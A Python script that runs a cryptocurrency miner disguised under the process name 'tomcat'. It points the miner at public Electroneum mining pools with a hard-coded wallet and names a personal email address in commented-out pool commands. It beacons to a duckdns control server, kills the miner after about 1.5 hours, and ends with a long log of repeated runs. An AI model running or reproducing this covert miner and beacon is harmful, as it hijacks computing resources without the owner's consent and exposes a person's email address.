import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:05.466964
#2018-02-17 17:12:05.957658
#2018-02-17 19:00:08.148848
#2018-02-17 20:49:05.466114
#2018-02-17 22:36:05.610579
#2018-02-18 00:20:08.584278
#2018-02-18 02:11:02.117154
#2018-02-18 03:58:06.048848
#2018-02-18 05:48:06.797026
#2018-02-18 07:40:08.230012
#2018-02-18 09:27:05.610066
#2018-02-18 11:13:03.963525
#2018-02-18 13:00:05.107696
#2018-02-18 14:49:06.129775
#2018-02-18 16:37:07.300346
#2018-02-18 18:26:05.516150
#2018-02-18 20:13:04.783037
#2018-02-18 21:59:05.189870
#2018-02-18 23:48:01.936654
#2018-02-19 01:34:05.960212
#2018-02-19 03:22:05.174757
#2018-02-19 05:07:05.728510
#2018-02-19 06:53:01.260685
#2018-02-19 08:43:05.526226
#2018-02-19 10:31:08.430680
#2018-02-19 12:19:06.666067
#2018-02-19 14:06:04.816072
#2018-02-19 15:54:05.034102
#2018-02-19 17:43:07.532977
#2018-02-19 19:31:02.069885
#2018-02-19 21:18:01.540507
#2018-02-19 23:03:05.008093
#2018-02-20 00:46:01.760542
#2018-02-20 02:36:01.243507
#2018-02-20 04:24:07.633078
#2018-02-20 06:08:03.748610
#2018-02-20 07:53:07.490825
#2018-02-20 09:38:08.722615
#2018-02-20 11:23:05.844046
#2018-02-20 13:11:09.278489
#2018-02-20 14:56:01.688149
#2018-02-20 16:41:09.619258
#2018-02-20 18:27:06.865414
#2018-02-20 20:20:09.399661
#2018-02-20 22:07:07.350036
#2018-02-20 23:49:02.013882
#2018-02-21 01:34:04.462782
#2018-02-21 03:23:04.517509
#2018-02-21 05:10:08.438035
#2018-02-21 06:58:07.185062
#2018-02-21 08:45:02.214356
#2018-02-21 10:31:07.633005
#2018-02-21 12:19:01.478126
#2018-02-21 14:07:07.201787
#2018-02-21 15:54:07.747667
#2018-02-21 17:48:12.277598
#2018-02-21 19:34:02.150711
#2018-02-21 21:23:01.699858
#2018-02-21 23:09:06.271505
#2018-02-22 00:57:03.964009
#2018-02-22 02:47:05.305466
#2018-02-22 04:33:05.429822
#2018-02-22 06:19:01.381290
#2018-02-22 08:06:02.194249
#2018-02-22 09:53:03.902598
#2018-02-22 11:38:01.696574
#2018-02-22 13:25:07.015820
#2018-02-22 15:15:06.504349
#2018-02-22 16:59:09.283746
#2018-02-22 18:47:04.166755
#2018-02-22 20:40:05.611563
#2018-02-22 22:27:02.255115
#2018-02-23 00:14:06.247805
#2018-02-23 02:03:07.446995
#2018-02-23 03:52:01.944805
#2018-02-23 05:41:03.925016
#2018-02-23 07:26:05.136358
#2018-02-23 09:29:05.604340
#2018-02-23 11:37:01.624601
#2018-02-23 13:28:05.998321
#2018-02-23 15:14:05.835023
#2018-02-23 17:03:09.408841
#2018-02-23 18:50:08.086231
#2018-02-23 20:35:08.493093
#2018-02-23 22:22:04.311072
#2018-02-24 00:07:06.309669
#2018-02-24 01:59:05.939359
#2018-02-24 03:50:02.691266
#2018-02-24 05:38:05.229869
#2018-02-24 07:26:01.722503
#2018-02-24 09:15:04.100975
#2018-02-24 11:10:04.006912
#2018-02-24 12:58:05.920294
#2018-02-24 14:46:01.537872
#2018-02-24 16:38:05.209085
#2018-02-24 18:26:06.485150
#2018-02-24 20:13:01.988170
#2018-02-24 21:59:03.765214
#2018-02-25 00:58:06.083234
#2018-02-25 04:34:06.022175
#2018-02-25 08:01:04.275050